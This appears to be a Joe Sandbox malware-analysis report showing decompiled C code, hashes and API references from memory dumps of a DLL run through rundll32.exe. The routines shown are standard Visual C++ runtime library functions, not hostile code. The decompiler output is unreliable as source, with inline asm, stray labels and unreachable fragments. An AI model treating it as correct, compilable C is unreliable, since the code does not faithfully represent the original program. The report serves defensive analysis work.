Runtime Error!Program: , xrefs: 10038FCD
<program name unknown>, xrefs: 10039010
..., xrefs: 1003904F
Microsoft Visual C++ Runtime Library, xrefs: 10039096

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction ID: afe29cdb41c4ee65c3bb8b902ab9bfe68787d4c676a15ac55f3717a69dda071b
Opcode Fuzzy Hash: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction Fuzzy Hash: E0216B76E003863EE326D2209C85E9B278CCF823C6F510439FD08DA142FB62DE05C1E9

Uniqueness

Uniqueness Score: -1.00%

Function 10027AD5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10027AD5(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E10028BDD(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E10028BDD(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E10027C17(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E10024468(GetLastError());
						_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E10027C17(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E10027C59(_a8);
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 10027ADA

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction ID: 57770cad2dc7d873b8782db2f193e3cd771f19afa728aead8fe90cc5b1cf633c
Opcode Fuzzy Hash: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction Fuzzy Hash: 06219F7560021ABFE721DF61AC81E5B77ACFF412A47A24924FA2C97151DB31FC408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10029E10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029E10(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0 || E10023828(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x10029e1f
0x10029e27
0x10029e72
0x10029e29
0x10029e32
0x00000000
0x10029e6f
0x10029e6e
0x10029e6e

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,10029DC9), ref: 10029E1F
GetLastError.KERNEL32(?,10029DC9), ref: 10029E29
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 10029E67

Strings

api-ms-, xrefs: 10029E36
ext-ms-, xrefs: 10029E4C

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction ID: baf72c8e3dffbcae0311709dc34ded704fcdaf485427fd651554a83b46c1da09
Opcode Fuzzy Hash: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction Fuzzy Hash: 0DF03030640249B7EF109B61ED46B5A3F99EB506C0FA24430FE0CE84E5EBA2E9519599

Uniqueness

Uniqueness Score: -1.00%

Function 1001070E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E1001070E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1004223c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x10010714
0x10010718
0x10010723
0x1001072b
0x10010736
0x1001073c
0x10010740
0x10010747
0x1001074d
0x1001074d
0x1001074f
0x10010754
0x00000000
0x10010759
0x10010760

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10010695,?,?,1001065D,00000000,70D9FFF6,?), ref: 10010723
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,10010695,?,?,1001065D,00000000,70D9FFF6,?), ref: 10010736
FreeLibrary.KERNEL32(00000000,?,?,10010695,?,?,1001065D,00000000,70D9FFF6,?), ref: 10010759

Strings

mscoree.dll, xrefs: 1001071C
CorExitProcess, xrefs: 1001072E

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction ID: afe5ac3e96f71655a5e367b3be99abbbceb1196fcb5638c15691c36776f791ea
Opcode Fuzzy Hash: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction Fuzzy Hash: 31F08230B01129FBDB01DB50CE49BDD7BA8DF00791F104060F941E10A0CB70DE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 100257D6, Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100257D6(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				signed short _v1324;
				void* __ebp;
				signed int _t247;
				void* _t250;
				signed int _t253;
				signed int _t255;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				void* _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t276;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				intOrPtr _t288;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t297;
				signed int _t299;
				void* _t300;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int* _t342;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				signed int* _t415;
				signed int _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				signed int _t432;
				intOrPtr _t433;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E10024214(0x6a6);
				_t246 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t246;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t428 = _t363 + 4;
					_t444 = _a4;
					 *_t428 = 0;
					_t247 = _t444 + 0x30;
					_push( *_t247);
					_v16 = _t247;
					_push(0x10044e40);
					_push( *0x10044d7c);
					E10025712(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x10044d7c;
					while(1) {
						L2:
						_t250 = E1002F999(_t428, 0x351, 0x10044e3c);
						_t466 = _t465 + 0xc;
						if(_t250 != 0) {
							break;
						} else {
							_t342 = _v16;
							_t415 =  &(_t342[4]);
							_t343 =  *_t342;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x10044e40);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E10025712(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x10044dac) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E100268B3(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E100268B3( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E100268B3( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t246 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E100268B3( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E100268B3( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t246 = _t363 + 4;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t246;
								}
								goto L20;
							}
							goto L135;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E1000E341();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t253 =  *0x1004d054; // 0xda1f8931
					_v60 = _t253 ^ _t461;
					_t255 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t255;
					if(_t255 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t255 = E100257D6(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t255 = E100250E8(_t424, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t261 = _v460;
										} else {
											_t380 =  *_t425;
											_t262 =  &_v276;
											while(1) {
												__eflags =  *_t262 -  *_t380;
												_t429 = _v464;
												if( *_t262 !=  *_t380) {
													break;
												}
												__eflags =  *_t262;
												if( *_t262 == 0) {
													L67:
													_t379 = 0;
													_t263 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t262 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t262 = _t262 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t263;
												if(_t263 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t264 =  &_v276;
													_push(_t264);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t264;
													if(_t264 == 0) {
														_t379 = 0;
														_t261 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t263 = _t262 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t261;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t255 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t265 = E1002FC2F(_t445, 0x10044e34);
											_t367 = _t265;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t266 = _t265 - _t445;
											__eflags = _t266;
											_v460 = _t266 >> 1;
											if(_t266 == 0) {
												break;
											} else {
												_t268 = 0x3b;
												__eflags =  *_t367 - _t268;
												if( *_t367 == _t268) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x10044d7c;
													_v456 = 1;
													do {
														_t269 = E10023828( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t269;
														if(_t269 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x10044dac;
													} while (_t368 <= 0x10044dac);
													_t365 = _v468 + 2;
													_t270 = E1002FBD6(_t382, _t365, 0x10044e3c);
													_t429 = _v464;
													_t448 = _t270;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t273 = E1002FBCB( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t273;
															if(_t273 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E1000E341();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t276 =  *0x1004d054; // 0xda1f8931
																_v560 = _t276 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E10023FB6(_t386, _t424) + 0x278;
																_t283 = E100250E8(_t424, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t283;
																if(_t283 == 0) {
																	L122:
																	_t284 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x2
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t286 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t286 -  *_t390;
																		_t454 = _v720;
																		if( *_t286 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t286;
																		if( *_t286 == 0) {
																			L89:
																			_t287 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t286 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t286 = _t286 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t287;
																		if(_t287 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t288 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t288 - _v712;
																			} while (_t288 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t291 = E10024214(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t291;
																			__eflags = _t291;
																			if(_t291 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_v736 = _t291 + 4;
																				_t293 = E10028A30(_t291 + 4, _v716,  &_v280);
																				_t472 = _t471 + 0xc;
																				__eflags = _t293;
																				if(_t293 != 0) {
																					_t294 = _v736;
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					E1000E341();
																					asm("int3");
																					_push(_t462);
																					_t297 = (_v1324 & 0x0000ffff) - 0x2d;
																					__eflags = _t297;
																					if(_t297 == 0) {
																						L134:
																						__eflags = 0;
																						return 0;
																					} else {
																						_t299 = _t297 - 1;
																						__eflags = _t299;
																						if(_t299 == 0) {
																							_t300 = 2;
																							return _t300;
																						} else {
																							__eflags = _t299 == 0x31;
																							if(_t299 == 0x31) {
																								goto L134;
																							} else {
																								__eflags = 1;
																								return 1;
																							}
																						}
																					}
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E10024D73(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E1002E537(_t424, __eflags, _v712, 1, 0x10044cf0, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E1003FDBF( &_v536,  *0x1004d0b4, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x10044d78; // 0x100245b6
																					 *0x1004223c(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x1004d178;
																						if(_t402 == 0x1004d178) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E100268B3( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E100268B3( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E100268B3( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t284 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E100268B3( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E100268B3(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t284 = _t424;
																			L123:
																			__eflags = _v16 ^ _t462;
																			return E100037EA(_t284, _v16 ^ _t462, _t424);
																		}
																		goto L135;
																	}
																	asm("sbb eax, eax");
																	_t287 = _t286 | 0x00000001;
																	__eflags = _t287;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E10004292();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t271 =  *_t445 & 0x0000ffff;
																	_t424 = _t271;
																	__eflags = _t271;
																	if(_t271 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L135;
										}
										_t255 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t255 =  *(_t429 + (_t255 + 2 + _t255 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t255);
							_push(_t429);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t461;
						return E100037EA(_t255, _v12 ^ _t461, _t424);
					}
				}
				L135:
			}

APIs

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 100258E5
_free.LIBCMT ref: 100258FC
_free.LIBCMT ref: 10025919
_free.LIBCMT ref: 10025934
_free.LIBCMT ref: 1002594B

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

